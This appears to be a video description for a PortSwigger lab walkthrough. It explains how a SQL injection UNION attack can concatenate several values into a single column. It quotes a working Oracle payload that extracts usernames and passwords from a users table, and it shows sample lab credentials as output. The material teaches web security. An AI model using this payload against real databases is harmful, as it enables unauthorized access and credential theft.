sql injection union attack retrieving multiple values in a single column

Portswigger Burpsuite sql injection union attack retrieving multiple values in a single column,lab sql injection union attack retrieving multiple values in a single column,

sql injection lab,portswigger sql injection lab solution,portswigger sql injection union attack,portswigger tutorial,portswigger lab walkthrough,portswigger lab solution,portswigger sql,portswigger youtube

Retrieving multiple values within a single column

In the preceding example, suppose instead that the query only returns a single column.

You can easily retrieve multiple values together within this single column by concatenating the values together, ideally including a suitable separator to let you distinguish the combined values. For example, on Oracle you could submit the input:

' UNION SELECT username || '~' || password FROM users--

This uses the double-pipe sequence || which is a string concatenation operator on Oracle. The injected query concatenates together the values of the username and password fields, separated by the ~ character.

The results from the query will let you read all of the usernames and passwords, for example:

...
administrator~s3cure
wiener~peter
carlos~montoya
...

Note that different databases use different syntax to perform string concatenation. For more details, see the SQL injection cheat sheet.

---------------------------------------------------
In this video, CyberWorldSec shows you how to check for sql injection

FOLLOW ME EVERYWHERE
---------------------------------------------------

-------------------------------------------------

Disclaimer :

These materials are for educational and research purposes only.

These videos teach you cyber secuirty and all the practicals are conducted on a safe to test learning labs provided by PortSwigger's Web Security Academy.

---------------------------------------------

SUBSCRIBE for more videos!
Thanks for watching!
Cheers!
----------------------------------------------